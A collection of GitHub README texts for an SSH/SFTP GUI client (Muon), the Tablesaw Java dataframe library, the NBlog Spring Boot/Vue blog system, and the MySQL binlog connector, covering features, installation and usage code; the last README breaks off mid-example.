Graphical SFTP client and terminal emulator with helpful utilities
command-snippet deployment devops disk-space-analyzer linux log-viewer monitoring monitoring-tool remote-admin-tool remote-execution remote-shell sftp ssh terminal terminal-emulator terminal-emulators
# Muon SSH Terminal/SFTP client ( Formerly Snowflake ) ![Java CI](https://github.com/subhra74/snowflake/workflows/Java%20CI/badge.svg?branch=master) [![Github All Releases](https://img.shields.io/github/downloads/subhra74/snowflake/total.svg)]() Easy and fun way to work with remote servers over SSH. This project is being renamed as previous name "Snowflake" is confusing since there is already a popular product with the same name. Muon is a graphical SSH client. It has a enhanced SFTP file browser, SSH terminal emulator, remote resource/process manager, server disk space analyzer, remote text editor, huge remote log viewer and lots of other helpful tools, which makes it easy to work with remote servers. Muon provides functionality similar to web based control panels but, it works over SSH from local computer, hence no installation required on server. It runs on Linux and Windows. Muon has been tested with serveral Linux and UNIX servers, like Ubuntu server, CentOS, RHEL, OpenSUSE, FreeBSD, OpenBSD, NetBSD and HP-UX. [![IMAGE ALT TEXT](https://raw.githubusercontent.com/subhra74/snowflake-screenshots/master/Capture32.PNG)](https://youtu.be/G2qHZ2NodeM "View on YouTube") <h3>Intended audience</h3> <p>The application is targeted mainly towards web/backend developers who often deploy/debug their code on remote servers and not overly fond of complex terminal based commands. It could also be useful for sysadmins as well who manages lots of remote servers manually. </p> <p> <a href="https://dev.to/subhra74/how-to-make-you-life-easier-on-remote-linux-servers-ssh-g7m"> This article explains some more cases </a> </p> <h3>How it works</h3> <div> <img src="https://github.com/subhra74/snowflake-screenshots/raw/master/arch-overview2.png"> </div> <h2>Download:</h2> <table> <tr> <th>Versions</th> <th>Windows</th> <th>Ubuntu/Mint/Debian</th> <th>Linux</th> <th>MacOS</th> <th>Other</th> </tr> <tr> <td> <a href="https://github.com/subhra74/snowflake/releases/tag/v1.0.4">v1.0.4</a> </td> <td> <a href="https://github.com/subhra74/snowflake/releases/download/v1.0.4/snowflake.msi">MSI installer</a> </td> <td> <a href="https://github.com/subhra74/snowflake/releases/download/v1.0.4/snowflake-1.0.4-setup-amd64.deb">DEB installer</a> </td> <td> <a href="https://github.com/subhra74/snowflake/releases/download/v1.0.4/snowflake-1.0.4-setup-amd64.bin">Generic installer (64 bit)</a> </td> <td> TBD </td> <td> <a href="https://github.com/subhra74/snowflake/releases/download/v1.0.4/snowflake.jar">Portable JAR (Java 13)</a> </td> </tr> <tr> <td> <a href="https://github.com/subhra74/snowflake/releases/tag/v1.0.3">v1.0.3</a> </td> <td> <a href="https://github.com/subhra74/snowflake/releases/download/v1.0.3/snowflake.msi">MSI installer</a> </td> <td> <a href="https://github.com/subhra74/snowflake/releases/download/v1.0.3/snowflake_1.0-3.deb">DEB installer</a> </td> <td> <a href="https://github.com/subhra74/snowflake/releases/download/v1.0.3/snowflake-1.0.3-setup-amd64.tar.xz">Generic installer (64 bit)</a> </td> <td> TBD </td> <td> <a href="https://github.com/subhra74/snowflake/releases/download/v1.0.3/snowflake.jar">JAR (Java 11)</a> </td> </tr> </table> <h2>Building from source:</h2> <pre> This is a standard maven project. If you have configured Java and Maven use: <b>mvn clean install</b> to build the project. The jar will be created in target directory </pre> <h2>Features:</h2> <ul> <li><a href="#a1">Simple graphical interface for common file operations<a></li> <li><a href="#a2">Built in text editor with syntax highlighting and support for sudo<a></li> <li><a href="#a3">Simply view and search huge log/text files in a jiffy<a></li> <li><a href="#a4">Fast powerful file and content search, powered by find command<a></li> <li><a href="#a5">Built in terminal and command snippet<a></li> <li><a href="#a6">Fully equiped task manager<a></li> <li><a href="#a7">Built in graphical disk space analyzer<a></li> <li><a href="#a8">Linux specific tools<a></li> <li><a href="#a9">Manage SSH keys easily<a></li> <li><a href="#a10">Network tools<a></li> </ul> <h4 id="a1">Simple graphical interface for common file operations</h4> <p>The app is designed to provide a simple graphical interface which allow common activities like moving files on server, renaming, cut, copy, paste, archiving, executing scripts, checking free space, calculating directory size, changing permissions, etc, in simple and efficient way. Though file browsing is based on SFTP, the app uses shell commands whenever posssible to perform operations efficiently. For example deleting a directory having huge number of files and sub directories can take a while using SFTP, but with simple rm command it's much faster. Also the app will prompt to user and can run sudo if priviledged operation needs to be performed. No switching to terminal is needed to invoke sudo. Moving files between servers is also supported with simple drag and drop.</p> <div> <img src="https://github.com/subhra74/snowflake-screenshots/blob/master/file-browser/1.PNG" width="700"> <img src="https://github.com/subhra74/snowflake-screenshots/blob/master/file-browser/2.png" width="700"> <img src="https://github.com/subhra74/snowflake-screenshots/blob/master/file-browser/3.png" width="700"> <img src="https://github.com/subhra74/snowflake-screenshots/blob/master/file-browser/4.png" width="700"> <img src="https://github.com/subhra74/snowflake-screenshots/blob/master/file-browser/5.PNG" width="700"> <img src="https://github.com/subhra74/snowflake-screenshots/blob/master/file-browser/6.png" width="700"> <img src="https://github.com/subhra74/snowflake-screenshots/blob/master/file-browser/7.PNG" width="700"> <img src="https://github.com/subhra74/snowflake-screenshots/blob/master/file-browser/8.png" width="700"> </div> <h4 id="a2">Built in text editor with syntax highlighting and support for sudo</h4> <p>Built in text editor comes in handy when dev or admin needs to modify some files. The editor can invoke sudo and prompt for passwords as needed. This could be very helpfull for modifying global configuration files (like /etc/profile, etc.) from editor without using vi or other terminal based editors.</p> <div> <img src="https://github.com/subhra74/snowflake-screenshots/blob/master/text-editor/9.PNG" width="700"> <img src="https://github.com/subhra74/snowflake-screenshots/blob/master/text-editor/10.png" width="700"> <img src="https://github.com/subhra74/snowflake-screenshots/blob/master/text-editor/11.png" width="700"> <img src="https://github.com/subhra74/snowflake-screenshots/blob/master/text-editor/12.png" width="700"> </div> <h4 id="a3">Simply view and search huge log/text files in a jiffy</h4> <p>The built in log viewer can show huge log files, up to several terabytes, in a very efficient manner. There is no need for downloading the whole file for view or search, thus skipping the pain of waiting for a long time to download the file, or using terminal based tools. The log viewer presents a paginated view of the file, which loads in much less time.</p> <div> <img src="https://github.com/subhra74/snowflake-screenshots/blob/master/log-viewer/13.PNG" width="700"> </div> <h4 id="a4">Fast powerful file and content search, powered by find command</h4> <p>Powerful search functionality, which allows users to find files by name, type, modification date and can also look inside compressed archives. For example it's now very easy to find all the files created in a date range.</p> <div> <img src="https://github.com/subhra74/snowflake-screenshots/blob/master/search/14.PNG" width="700"> </div> <h4 id="a5">Built in terminal and command snippet</h4> <p>With built in terminal, all command line operations can be performed. The terminal is also integrated with the file browser page, so users can open terminal from specific directory or execute scripts in terminal from file browser itself with a click of mouse. Also you can create snippets of your most used commands and execute them with a few clicks without typing again and again.</p> <div> <img src="https://github.com/subhra74/snowflake-screenshots/blob/master/terminal/15.PNG" width="700"> <img src="https://github.com/subhra74/snowflake-screenshots/blob/master/terminal/16.PNG" width="700"> <img src="https://github.com/subhra74/snowflake-screenshots/blob/master/terminal/17.PNG" width="700"> <img src="https://github.com/subhra74/snowflake-screenshots/blob/master/terminal/18.PNG" width="700"> <img src="https://github.com/subhra74/snowflake-screenshots/blob/master/terminal/19.png" width="700"> <img src="https://github.com/subhra74/snowflake-screenshots/blob/master/terminal/20.PNG" width="700"> <img src="https://github.com/subhra74/snowflake-screenshots/blob/master/terminal/31.PNG" width="700"> </div> <h4 id="a6">Fully equipped task manager</h4> <p>Monitor resource usage (CPU, RAM, swap) and view/manage processes from a familiar GUI. It is equipped with search and kill process functionaliy, and also with a option to kill processes with sudo. It's very easy to check which process is using most CPU or memory and view the full command line of the process.</p> <div> <img src="https://github.com/subhra74/snowflake-screenshots/blob/master/system-monitor/21.PNG" width="700"> <img src="https://github.com/subhra74/snowflake-screenshots/blob/master/system-monitor/22.png" width="700"> </div> <h4 id="a7">Built in graphical disk space analyzer</h4> <p>A friendly GUI which allows users to find out what is eating up diskspace. Any of the mounted partitions or directories can be analyzed.</p> <div> <img src="https://github.com/subhra74/snowflake-screenshots/blob/master/disk-analyzer/23.PNG" width="700"> <img src="https://github.com/subhra74/snowflake-screenshots/blob/master/disk-analyzer/24.PNG" width="700"> </div> <h4 id="a8">Linux specific tools</h4> <p>Few handy tools which can make devs or admins life easier like getting information about the system and distro, starting and stopping systemd services and finding which process is listening on which port.</p> <div> <img src="https://github.com/subhra74/snowflake-screenshots/blob/master/linux-tools/25.PNG" width="700"> <img src="https://github.com/subhra74/snowflake-screenshots/blob/master/linux-tools/26.PNG" width="700"> <img src="https://github.com/subhra74/snowflake-screenshots/blob/master/linux-tools/27.PNG" width="700"> </div> <h4 id="a9">Manage SSH keys easily</h4> <p>Simple and handy UI for creating and managing local and remote SSH keys. Also it supports managing authorized keys from GUI.</p> <div> <img src="https://github.com/subhra74/snowflake-screenshots/blob/master/ssh-keys/28.PNG" width="700"> </div> <h4 id="a10">Network tools</h4> <p>Graphical interface for ping, port checking, traceroute and DNS lookup.</p> <div> <img src="https://github.com/subhra74/snowflake-screenshots/blob/master/network-tools/29.PNG" width="700"> <img src="https://github.com/subhra74/snowflake-screenshots/blob/master/network-tools/30.PNG" width="700"> </div> <h2>Documentation:</h2> <p> <a href="https://github.com/subhra74/snowflake/wiki"> https://github.com/subhra74/snowflake/wiki </a> </p>
Java dataframe and visualization library
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Tablesaw ======= [![Apache 2.0](https://img.shields.io/github/license/nebula-plugins/nebula-project-plugin.svg)](http://www.apache.org/licenses/LICENSE-2.0) [![Build Status](https://travis-ci.org/jtablesaw/tablesaw.svg?branch=master)](https://travis-ci.org/jtablesaw/tablesaw) [![Codacy Badge](https://app.codacy.com/project/badge/Grade/3ebd154b5253466b932cb17dda737293)](https://www.codacy.com/gh/jtablesaw/tablesaw/dashboard?utm_source=github.com&amp;utm_medium=referral&amp;utm_content=jtablesaw/tablesaw&amp;utm_campaign=Badge_Grade) [![Maintainability Rating](https://sonarcloud.io/api/project_badges/measure?project=jtablesaw_tablesaw&metric=sqale_rating)](https://sonarcloud.io/dashboard?id=jtablesaw_tablesaw) ### Overview __Tablesaw__ is a dataframe and visualization library that supports loading, cleaning, transforming, filtering, and summarizing data. If you work with data in Java, it may save you time and effort. Tablesaw also supports descriptive statistics and can be used to prepare data for working with machine learning libraries like Smile, Tribuo, H20.ai, DL4J. ### Tablesaw features #### Data processing & transformation * Import data from RDBMS, Excel, CSV, TSV, JSON, HTML, or Fixed Width text files, whether they are local or remote (http, S3, etc.) * Export data to CSV, JSON, HTML or Fixed Width files. * Combine tables by appending or joining * Add and remove columns or rows * Sort, Group, Filter, Edit, Transpose, etc. * Map/Reduce operations * Handle missing values #### Visualization Tablesaw supports data visualization by providing a wrapper for the Plot.ly JavaScript plotting library. Here are a few examples of the new library in action. | ![Tornadoes](https://jtablesaw.github.io/tablesaw/userguide/images/eda/box1.png) | ![Tornadoes](https://jtablesaw.github.io/tablesaw/userguide/images/eda/scatter_2_Yaxes.png) | ![Tornadoes](https://jtablesaw.github.io/tablesaw/userguide/images/tornado.scatter.png) | | ------------------------------------------------------------ | ------------------------------------------------------------ | ------------------------------------------------------------ | | ![Tornadoes](https://jtablesaw.github.io/tablesaw/userguide/images/eda/bush_time_series2.png) | ![Tornadoes](https://jtablesaw.github.io/tablesaw/userguide/images/eda/hist_overlay.png) | ![Tornadoes](https://jtablesaw.github.io/tablesaw/userguide/images/eda/histogram2.png) | | ![Tornadoes](https://jtablesaw.github.io/tablesaw/userguide/images/eda/histogram2d.png) | ![Tornadoes](https://jtablesaw.github.io/tablesaw/userguide/images/eda/pie.png) | ![Tornadoes](https://jtablesaw.github.io/tablesaw/userguide/images/eda/wine_bubble_3d.png) | | ![](https://jtablesaw.github.io/tablesaw/userguide/images/eda/wine_bubble_with_groups.png) | ![](https://jtablesaw.github.io/tablesaw/userguide/images/eda/robberies_area.png) | ![](https://jtablesaw.github.io/tablesaw/userguide/images/ml/regression/wins%20by%20year.png) | | ![Tornadoes](https://jtablesaw.github.io/tablesaw/userguide/images/eda/bush_heatmap1.png) | ![Tornadoes](https://jtablesaw.github.io/tablesaw/userguide/images/eda/tornado_bar_groups.png) | ![Tornadoes](https://jtablesaw.github.io/tablesaw/userguide/images/eda/ohlc1.png) | #### Statistics * Descriptive stats: mean, min, max, median, sum, product, standard deviation, variance, percentiles, geometric mean, skewness, kurtosis, etc. ### Getting started Add tablesaw-core to your project. You can find the version number for the latest release in the [release notes](https://github.com/jtablesaw/tablesaw/releases): ```xml <dependency> <groupId>tech.tablesaw</groupId> <artifactId>tablesaw-core</artifactId> <version>VERSION_NUMBER_GOES_HERE</version> </dependency> ``` You may also add supporting projects: - `tablesaw-beakerx` - for using Tablesaw inside [BeakerX](http://beakerx.com/) - `tablesaw-excel` - for using Excel workbooks - `tablesaw-html` - for using HTML - `tablesaw-json` - for using JSON - `tablesaw-jsplot` - for creating charts External supporting projects - **outside of this organization**: - [tablesaw-parquet](https://github.com/tlabs-data/tablesaw-parquet) - for using the [Apache Parquet](https://parquet.apache.org/) file format with Tablesaw ([report issue](https://github.com/tlabs-data/tablesaw-parquet/issues)) ### Documentation and support * Start here: https://jtablesaw.github.io/tablesaw/gettingstarted * Then see our documentation page: https://jtablesaw.github.io/tablesaw/ and the [Tablesaw User Guide](https://jtablesaw.github.io/tablesaw/userguide/toc). * Ask questions, make suggestions, or tell us how you're using Tablesaw in the new GitHub [discussions forum](https://github.com/jtablesaw/tablesaw/discussions). * Feature requests and bug reports can be made on the [issues tab](https://github.com/jtablesaw/tablesaw/issues). ### Integrations #### Jupyter Notebooks * We recommend trying Tablesaw inside [Jupyter notebooks](http://arogozhnikov.github.io/2016/09/10/jupyter-features.html), which lets you experiment with Tablesaw in a more interactive manner. Get started by [installing BeakerX](http://beakerx.com/documentation) and trying [the sample Tablesaw notebook](https://github.com/twosigma/beakerx/blob/master/doc/groovy/Tablesaw.ipynb) * A second way to use Tablesaw inside [Jupyter notebooks](http://arogozhnikov.github.io/2016/09/10/jupyter-features.html) is with [IJava](https://github.com/SpencerPark/IJava), which has built-in support for Tablesaw. Gary Sharpe has written [an excellent tutorial](https://medium.com/@gmsharpe/java-jupyter-plotly-e1bbaa7f2be8) that shows you how to use Tablesaw plots. Gary has written a number of other tutorials that feature Tablesaw: * [Tidy Data with Java & Jupyter](https://medium.com/@gmsharpe/tidy-data-with-java-jupyter-b1e131b37ab0) * [Dataframes with Tablesaw — JSON](https://medium.com/@gmsharpe/dataframes-with-tablesaw-json-46dda9c8c217?source=your_stories_page----------------------------------------) * [Dataframes with Tablesaw — CSV Files](https://medium.com/@gmsharpe/importing-data-with-tablesaw-part-1-csv-files-3ac6f135cf6f?source=your_stories_page----------------------------------------) * A third approach is to use [Google Colab](https://colab.research.google.com). Again, Gary Sharpe has an excellent tutorial:[Getting Started with Dataframes using Java and Google Colab](https://medium.com/@gmsharpe/getting-started-with-tablesaw-and-google-colab-65ef0cbe280c) #### Other integrations * Eclipse uses may find [etablesaw](https://github.com/hallvard/etablesaw) useful. It provides Eclipse integration aimed at turning Eclipse into a data workbench. * You may utilize Tablesaw with many machine learning libraries. To see an example of using Tablesaw with [Smile](https://haifengl.github.io) check out [the sample Tablesaw Jupyter notebook](https://github.com/twosigma/beakerx/blob/master/doc/groovy/Tablesaw.ipynb) * You may use [quandl4j-tablesaw](http://quandl4j.org) if you'd like to load financial and economic data from [Quandl](https://www.quandl.com) into Tablesaw. This is demonstrated in [the sample Tablesaw notebook](https://github.com/twosigma/beakerx/blob/master/doc/groovy/Tablesaw.ipynb) as well
🍓 Spring Boot + Vue 前后端分离博客系统 https://naccl.top
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<p align="center"> <a href="https://naccl.top/" target="_blank"> <img src="./pic/NBlog.png" alt="NBlog logo" style="width: 200px; height: 200px"> </a> </p> <p align="center"> <img src="https://img.shields.io/badge/JDK-1.8+-orange"> <img src="https://img.shields.io/badge/SpringBoot-2.2.7.RELEASE-brightgreen"> <img src="https://img.shields.io/badge/MyBatis-3.5.5-red"> <img src="https://img.shields.io/badge/Vue-2.6.11-brightgreen"> <img src="https://img.shields.io/badge/license-MIT-blue"> <img src="https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2FNaccl%2FNBlog&count_bg=%2344CC11&title_bg=%23555555&icon=notist.svg&icon_color=%231296DB&title=hits&edge_flat=false"> </p> ## 简介 Spring Boot + Vue「前后端分离,人不分离」博客系统 自用博客,长期维护,欢迎勘误 预览地址: 前台:[https://naccl.top](https://naccl.top) 后台:[https://admin.naccl.top](https://admin.naccl.top) ## 后端 1. 核心框架:[Spring Boot](https://github.com/spring-projects/spring-boot) 2. 安全框架:[Spring Security](https://github.com/spring-projects/spring-security) 3. Token:[jjwt](https://github.com/jwtk/jjwt) 4. ORM 框架:[MyBatis](https://github.com/mybatis/spring-boot-starter) 5. 分页插件:[PageHelper](https://github.com/pagehelper/Mybatis-PageHelper) 6. NoSQL 缓存:[Redis](https://github.com/redis/redis) 7. Markdown 转 HTML:[commonmark-java](https://github.com/commonmark/commonmark-java) 8. 离线 IP 地址库:[ip2region](https://github.com/lionsoul2014/ip2region) 9. 定时任务:[quartz](https://github.com/quartz-scheduler/quartz) 10. UserAgent 解析:[yauaa](https://github.com/nielsbasjes/yauaa) 邮件模板参考自 [Typecho-CommentToMail-Template](https://github.com/MisakaTAT/Typecho-CommentToMail-Template) ## 前端 核心框架:Vue2.x、Vue Router、Vuex Vue 项目基于 @vue/cli4.x 构建 JS 依赖及参考的 css:[axios](https://github.com/axios/axios)、[moment](https://github.com/moment/moment)、[nprogress](https://github.com/rstacruz/nprogress)、[v-viewer](https://github.com/fengyuanchen/viewerjs)、[prismjs](https://github.com/PrismJS/prism)、[APlayer](https://github.com/DIYgod/APlayer)、[MetingJS](https://github.com/metowolf/MetingJS)、[lodash](https://github.com/lodash/lodash)、[mavonEditor](https://github.com/hinesboy/mavonEditor)、[echarts](https://github.com/apache/echarts)、[tocbot](https://github.com/tscanlin/tocbot)、[iCSS](https://github.com/chokcoco/iCSS) **由 [@willWang8023](https://github.com/willWang8023) 维护的 Vue3 版本请查看 [blog-view-vue3](https://github.com/willWang8023/blog-view-vue3)** ### 后台 UI 后台基于 [vue-admin-template](https://github.com/PanJiaChen/vue-admin-template) 二次修改后的 [my-vue-admin-template](https://github.com/Naccl/my-vue-admin-template) 模板进行开发([于2021年11月1日重构](https://github.com/Naccl/NBlog/commit/b33641fe34b2bed34e8237bacf67146cd64be4cf)) UI 框架为 [Element UI](https://github.com/ElemeFE/element) ### 前台 UI [Semantic UI](https://semantic-ui.com/):主要使用,页面布局样式,个人感觉挺好看的 UI 框架,比较适合前台界面的开发,语义化的 css,前一版博客系统使用过,可惜该框架 Vue 版的开发完成度不高,见 [Semantic UI Vue](https://semantic-ui-vue.github.io/#/) [Element UI](https://github.com/ElemeFE/element):部分使用,一些小组件,弥补了 Semantic UI 的不足,便于快速实现效果 文章排版:基于 [typo.css](https://github.com/sofish/typo.css) 修改 ## Telegram Bot 快捷操作 | 桌面 | Phone | Phone | | ------------------------------------------------------------ | ------------------------------------------------------------ | ------------------------------------------------------------ | | ![桌面客户端效果图](./pic/TelegramBot.png "桌面客户端效果图") | ![手机客户端效果图1](./pic/TgBotPhone1.png "手机客户端效果图1") | ![手机客户端效果图2](./pic/TgBotPhone2.png "手机客户端效果图2") | 若要启用该功能,参考以下步骤: 1. 向 @BotFather 申请一个 Bot,得到该 Bot 的`token`,格式如`1234567890:qwertyuiopasdfghjklzxcvbnm` 2. 与该 Bot 私聊,随便发个消息,然后打开此链接`https://api.telegram.org/bot<botToken>/getUpdates`(替换链接中的 token),在`result -> message -> chat -> id`得到`chatId` 3. 将获取的`token`和`chatId`填入`application-dev.properties`,并启用`comment.notify.channel=tg` 4. 由于目前仅提供 webhook 的方式获取消息更新,所以`application-dev.properties`中的`blog.api`需要填写后端 API 的地址,并且**必须是`https`(Telegram 的要求)**,也就是说如果你没有公网 IP 或内网穿透或反向代理,那么在本地环境是无法测试的,建议直接扔服务器上 5. 国内通常情况下无法访问 TG 的 API,因此提供了两种方式 1. 正向代理:配置`http.proxy.server`,通过你的代理发送请求 2. 反向代理:可以直接使用我跑在 Cloudflare Workers 上的反代,默认配置即可。示例代码已放在`blog-api/cfworker-tg-api-open.js`,可自行搭建(**22.05.12 更新,近两天大陆绝大多数地区 `*.workers.dev` 域名已被墙,因此若仍想使用此反代方式访问 cf worker,需要将 Worker 绑定路由至自己的域名,详见[相关讨论](https://github.com/XIU2/CloudflareSpeedTest/issues/205)**) ## 开发环境 1. 创建 MySQL 数据库`nblog`,并执行`/blog-api/nblog.sql`初始化表数据 2. 修改配置信息`/blog-api/src/main/resources/application-dev.properties` 3. 安装 Redis 并启动 4. 启动后端服务 5. 分别在`blog-cms`和`blog-view`目录下执行`npm install`安装依赖 6. 分别在`blog-cms`和`blog-view`目录下执行`npm run serve`启动前后台页面 ## 注意事项 一些常见问题: - MySQL 确保数据库字符集为`utf8mb4`(”站点设置“及”文章详情“等许多表字段需要`utf8mb4`格式字符集来支持 emoji 表情,否则在导入 sql 文件时,即使成功导入,也会有部分字段内容不完整,导致前端页面渲染数据时报错) - 确保 Maven 和 NPM 能够成功导入现版本依赖,请勿升级或降低依赖版本 - 数据库中默认用户名密码为`Admin`,`123456`,因为是个人博客,没打算做修改密码的页面,可在`top.naccl.util.HashUtils`下的`main`方法手动生成密码存入数据库 - 注意修改`application-dev.properties`的配置信息 - 注意修改`token.secretKey`,否则无法保证 token 安全性 - `spring.mail.host`及`spring.mail.port`的默认配置为阿里云邮箱,其它邮箱服务商参考关键字`spring mail 服务器`(邮箱配置用于接收/发送评论提醒) - 如需部署,注意将`/blog-view/src/plugins/axios.js`和`/blog-cms/src/util/request.js`中的`baseUrl`修改为你的后端 API 地址 - 大部分个性化配置可以在后台“站点设置”中修改,小部分由于考虑到首屏加载速度(如首页大图)需要修改前端源码 ## 隐藏功能 - 在前台访问`/login`路径登录后,可以以博主身份(带有博主标识)回复评论,且不需要填写昵称和邮箱即可提交 - 在 Markdown 中加入`<meting-js server="netease" type="song" id="歌曲id" theme="#25CCF7"></meting-js>` (注意以正文形式添加,而不是代码片段)可以在文章中添加 [APlayer](https://github.com/DIYgod/APlayer) 音乐播放器,`netease`为网易云音乐,其它配置及具体用法参考 [MetingJS](https://github.com/metowolf/MetingJS) - 提供了两种隐藏文字效果:在 Markdown 中使用`@@`包住文字,文字会被渲染成“黑幕”效果,鼠标悬浮在上面时才会显示;使用`%%`包住文字,文字会被“蓝色覆盖层”遮盖,只有鼠标选中状态才会反色显示。例如:`@@隐藏文字@@`,`%%隐藏文字%%` ## LICENSE [MIT](https://github.com/Naccl/NBlog/blob/master/LICENSE) ## Thanks 感谢 [JetBrains](https://www.jetbrains.com/?from=NBlog) 提供的 Open Source License 感谢上面提到的每个开源项目
MySQL Binary Log connector
# mysql-binlog-connector-java [![Build Status](https://travis-ci.org/shyiko/mysql-binlog-connector-java.svg?branch=master)](https://travis-ci.org/shyiko/mysql-binlog-connector-java) [![Coverage Status](https://coveralls.io/repos/shyiko/mysql-binlog-connector-java/badge.svg?branch=master)](https://coveralls.io/r/shyiko/mysql-binlog-connector-java?branch=master) [![Maven Central](https://img.shields.io/maven-central/v/com.github.shyiko/mysql-binlog-connector-java.svg)](http://search.maven.org/#search%7Cga%7C1%7Cg%3A%22com.github.shyiko%22%20AND%20a%3A%22mysql-binlog-connector-java%22) ## ATTENTION: This repository is no longer maintained. I recommend migrating to [osheroff/mysql-binlog-connector-java](https://github.com/osheroff/mysql-binlog-connector-java). MySQL Binary Log connector. Initially project was started as a fork of [open-replicator](https://code.google.com/p/open-replicator), but ended up as a complete rewrite. Key differences/features: - automatic binlog filename/position | GTID resolution - resumable disconnects - plugable failover strategies - binlog_checksum=CRC32 support (for MySQL 5.6.2+ users) - secure communication over the TLS - JMX-friendly - real-time stats - availability in Maven Central - no third-party dependencies - test suite over different versions of MySQL releases > If you are looking for something similar in other languages - check out [siddontang/go-mysql](https://github.com/siddontang/go-mysql) (Go), [noplay/python-mysql-replication](https://github.com/noplay/python-mysql-replication) (Python). ## Usage Get the latest JAR(s) from [here](http://search.maven.org/#search%7Cga%7C1%7Cg%3A%22com.github.shyiko%22%20AND%20a%3A%22mysql-binlog-connector-java%22). Alternatively you can include following Maven dependency (available through Maven Central): ```xml <dependency> <groupId>com.github.shyiko</groupId> <artifactId>mysql-binlog-connector-java</artifactId> <version>0.21.0</version> </dependency> ``` #### Reading binary log file ```java File binlogFile = ... EventDeserializer eventDeserializer = new EventDeserializer(); eventDeserializer.setCompatibilityMode( EventDeserializer.CompatibilityMode.DATE_AND_TIME_AS_LONG, EventDeserializer.CompatibilityMode.CHAR_AND_BINARY_AS_BYTE_ARRAY ); BinaryLogFileReader reader = new BinaryLogFileReader(binlogFile, eventDeserializer); try { for (Event event; (event = reader.readEvent()) != null; ) { ... } } finally { reader.close(); } ``` #### Tapping into MySQL replication stream > PREREQUISITES: Whichever user you plan to use for the BinaryLogClient, he MUST have [REPLICATION SLAVE](http://dev.mysql.com/doc/refman/5.5/en/privileges-provided.html#priv_replication-slave) privilege. Unless you specify binlogFilename/binlogPosition yourself (in which case automatic resolution won't kick in), you'll need [REPLICATION CLIENT](http://dev.mysql.com/doc/refman/5.5/en/privileges-provided.html#priv_replication-client) granted as well. ```java BinaryLogClient client = new BinaryLogClient("hostname", 3306, "username", "password"); EventDeserializer eventDeserializer = new EventDeserializer(); eventDeserializer.setCompatibilityMode( EventDeserializer.CompatibilityMode.DATE_AND_TIME_AS_LONG, EventDeserializer.CompatibilityMode.CHAR_AND_BINARY_AS_BYTE_ARRAY ); client.setEventDeserializer(eventDeserializer); client.registerEventListener(new EventListener() { @Override public void onEvent(Event event) { ... } }); client.connect(); ``` > You can register a listener for `onConnect` / `onCommunicationFailure` / `onEventDeserializationFailure` / `onDisconnect` using `client.registerLifecycleListener(...)`. > By default, BinaryLogClient starts from the current (at the time of connect) master binlog position. If you wish to kick off from a specific filename or position, use `client.setBinlogFilename(filename)` + `client.setBinlogPosition(position)`. > `client.connect()` is blocking (meaning that client will listen for events in the current thread). `client.connect(timeout)`, on the other hand, spawns a separate thread. #### Controlling event deserialization > You might need it for several reasons: you don't want to waste time deserializing events you won't need; there is no EventDataDeserializer defined for the event type you are interested in (or there is but it contains a bug); you want certain type of events to be deserialized in a different way (perhaps *RowsEventData should contain table name and not id?); etc. ```java EventDeserializer eventDeserializer = new EventDeserializer(); // do not deserialize EXT_DELETE_ROWS event data, return it as a byte array eventDeserializer.setEventDataDeserializer(EventType.EXT_DELETE_ROWS, new ByteArrayEventDataDeserializer()); // skip EXT_WRITE_ROWS event data altogether eventDeserializer.setEventDataDeserializer(EventType.EXT_WRITE_ROWS, new NullEventDataDeserializer()); // use custom event data deserializer for EXT_DELETE_ROWS eventDeserializer.setEventDataDeserializer(EventType.EXT_DELETE_ROWS, new EventDataDeserializer() { ... }); BinaryLogClient client = ... client.setEventDeserializer(eventDeserializer); ``` #### Exposing BinaryLogClient through JMX ```java MBeanServer mBeanServer = ManagementFactory.getPlatformMBeanServer(); BinaryLogClient binaryLogClient = ... ObjectName objectName = new ObjectName("mysql.binlog:type=BinaryLogClient"); mBeanServer.registerMBean(binaryLogClient, objectName); // following bean accumulates various BinaryLogClient stats // (e.g. number of disconnects, skipped events) BinaryLogClientStatistics stats = new BinaryLogClientStatistics(binaryLogClient); ObjectName statsObjectName = new ObjectName("mysql.binlog:type=BinaryLogClientStatistics"); mBeanServer.registerMBean(stats, statsObjectName); ``` #### Using SSL > Introduced in 0.4.0. TLSv1.1 & TLSv1.2 require [JDK 7](http://bugs.java.com/bugdatabase/view_bug.do?bug_id=6916074)+. Prior to MySQL 5.7.10, MySQL supported only TLSv1 (see [Secure Connection Protocols and Ciphers](http://dev.mysql.com/doc/refman/5.7/en/secure-connection-protocols-ciphers.html)). > To check that MySQL server is [properly configured with SSL support](http://dev.mysql.com/doc/refman/5.7/en/using-secure-connections.html) - `mysql -h host -u root -ptypeyourpasswordmaybe -e "show global variables like 'have_%ssl';"` ("Value" should be "YES"). State of the current session can be determined using `\s` ("SSL" should not be blank). ```java System.setProperty("javax.net.ssl.trustStore", "/path/to/truststore.jks"); System.setProperty("javax.net.ssl.trustStorePassword","truststore.password"); System.setProperty("javax.net.ssl.keyStore", "/path/to/keystore.jks"); System.setProperty("javax.net.ssl.keyStorePassword", "keystore.password"); BinaryLogClient client = ... client.setSSLMode(SSLMode.VERIFY_IDENTITY); ``` ## Implementation notes - data of numeric types (tinyint, etc) always returned signed(!) regardless of whether column definition includes "unsigned" keyword or not. - data of var\*/\*text/\*blob types always returned as a byte array (for var\* this is true starting from 1.0.0). ## Frequently Asked Questions **Q**. How does a typical transaction look like? **A**. GTID event (if gtid_mode=ON) -> QUERY event with "BEGIN" as sql -> ... -> XID event | QUERY event with "COMMIT" or "ROLLBACK" as sql. **Q**. EventData for inserted/updated/deleted rows has no information about table (except for some weird id). How do I make sense out of it? **A**. Each [WriteRowsEventData](https://github.com/shyiko/mysql-binlog-connector-java/blob/master/src/main/java/com/github/shyiko/mysql/binlog/event/WriteRowsEventData.java)/[UpdateRowsEventData](https://github.com/shyiko/mysql-binlog-connector-java/blob/master/src/main/java/com/github/shyiko/mysql/binlog/event/UpdateRowsEventData.java)/[DeleteRowsEventData](https://github.com/shyiko/mysql-binlog-connector-java/blob/master/src/main/java/com/github/shyiko/mysql/binlog/event/DeleteRowsEventData.java) event is preceded by [TableMapEventData](https://github.com/shyiko/mysql-binlog-connector-java/blob/master/src/main/java/com/github/shyiko/mysql/binlog/event/TableMapEventData.java) which contains schema & table name. If for some reason you need to know column names (types, etc). - the easiest way is to ```sql select TABLE_SCHEMA, TABLE_NAME, COLUMN_NAME, ORDINAL_POSITION, COLUMN_DEFAULT, IS_NULLABLE, DATA_TYPE, CHARACTER_MAXIMUM_LENGTH, CHARACTER_OCTET_LENGTH, NUMERIC_PRECISION, NUMERIC_SCALE, 